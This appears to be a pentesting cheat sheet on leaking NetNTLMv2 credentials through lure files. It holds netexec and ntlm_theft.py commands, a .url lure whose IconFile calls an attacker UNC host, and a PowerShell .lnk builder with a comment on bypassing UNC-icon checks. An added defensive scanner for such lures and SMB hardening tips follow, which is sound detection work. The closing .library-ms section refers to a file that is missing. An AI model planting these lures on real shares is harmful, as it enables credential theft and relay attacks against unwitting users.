Steal NTLM

Lure files that reference a UNC path trigger implicit SMB authentication from the host that renders them, leaking a NetNTLMv2 response to the listener.

nxc

netexec smb <IP> -u <USER> -p <PASS> -M slinky -o NAME=evil SHARE=<NAME_SHARE> SERVER=<MyIP>

python3 ntlm_theft.py -g all -s <IP> -f evil
# in smbclient, upload the generated lure files to the target share
prompt off
mput evil/*

.url

evil.url
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0

.lnk

$lnk = "$env:USERPROFILE\Desktop\evil.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\<IP>\share\payload.exe"  # LISTENER SERVER
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()
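
The .url and .lnk lures above both work by embedding a UNC path to an attacker-controlled host in a field Explorer resolves automatically. The following scanner is an added example for the defensive side, not code from the original page: it parses .url files as INI and attributes each UNC reference to its key, and sweeps .lnk files (which store strings as UTF-16LE) for UNC paths, flagging any host that is an IP literal or is missing from an allowlist. The allowlist, the sample files and the minimal .lnk-like blob are constructed for the example.

```python
"""Scan files dropped on a share for NTLM-leaking lure indicators.

Added example, not part of the original page: flags .url and .lnk files whose
IconFile / IconLocation / TargetPath point at a UNC path on a host outside an
allowlist. Sample files are constructed inline so the script runs offline.
"""
import configparser
import ipaddress
import re

# Hosts legitimately referenced by UNC paths in this environment.
# Assumed allowlist for the example; replace with your own file servers.
ALLOWED_HOSTS = {"fileserver01", "fileserver01.corp.local"}

# \\host\share\... ; the host is captured for review.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\[^\s\"'<>]*")

# HeaderSize (0x4C) followed by the start of the LinkCLSID of a real .lnk file.
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00"


def host_is_suspicious(host: str) -> bool:
    """A UNC host is suspicious when it is not allowlisted or is a raw IP literal."""
    if host.lower() in ALLOWED_HOSTS:
        return False
    try:
        ipaddress.ip_address(host)
        return True  # IP literal in an icon/target path is a classic lure indicator
    except ValueError:
        return True  # unknown hostname: treat as suspicious until reviewed


def unc_hosts(text: str):
    """Return every UNC host referenced in the text, in order of appearance."""
    return [m.group(1) for m in UNC_RE.finditer(text)]


def scan_url_file(data: bytes):
    """Parse the INI-style .url and attribute each UNC reference to its key."""
    findings = []
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(data.decode("utf-8", errors="replace"))
    if not cp.has_section("InternetShortcut"):
        return findings
    for key in ("IconFile", "URL", "WorkingDirectory"):
        value = cp.get("InternetShortcut", key, fallback="")
        for host in unc_hosts(value):
            if host_is_suspicious(host):
                findings.append(f"{key} -> UNC host {host}")
    return findings


def scan_lnk_file(data: bytes):
    """Sweep a .lnk for UNC paths in both byte-string and UTF-16LE encodings."""
    findings = set()
    if not data.startswith(LNK_MAGIC):
        return []
    texts = [data.decode("latin-1")]
    # Strings inside a .lnk may sit at either alignment, so decode both offsets.
    for offset in (0, 1):
        texts.append(data[offset:].decode("utf-16-le", errors="ignore"))
    for text in texts:
        for host in unc_hosts(text):
            if host_is_suspicious(host):
                findings.add(f"UNC host {host}")
    return sorted(findings)


def scan(name: str, data: bytes):
    """Dispatch on extension; other file types are out of scope for this check."""
    lowered = name.lower()
    if lowered.endswith(".url"):
        return scan_url_file(data)
    if lowered.endswith(".lnk"):
        return scan_lnk_file(data)
    return []


# Constructed samples (not real captures): the .url from the page, a benign
# .url pointing at an allowlisted server, and a minimal .lnk-like blob.
SAMPLES = {
    "evil.url": (b"[InternetShortcut]\r\nURL=http://intranet\r\n"
                 b"IconFile=\\\\10.10.14.2\\share\\icon.ico\r\nIconIndex=0\r\n"),
    "report.url": (b"[InternetShortcut]\r\nURL=https://intranet.corp.local/\r\n"
                   b"IconFile=\\\\fileserver01\\icons\\doc.ico\r\n"),
    "evil.lnk": LNK_MAGIC + b"\x00" * 68
                + "\\\\10.10.14.2\\share\\payload.exe".encode("utf-16-le"),
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        hits = scan(name, data)
        print(f"{name}: {'SUSPICIOUS: ' + '; '.join(hits) if hits else 'clean'}")
```

Run it against a mounted share (or a file-write event's payload) and alert on any hit; pair it with egress filtering of TCP 445 and SMB signing so that a lure which does slip through has nowhere to send the NetNTLMv2 response.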

.library-ms ZIP

ZIP and deliver the file below

See also: https://book.hacktricks.wiki/en/windows-hardening/ntlm/places-to-steal-ntlm-creds.html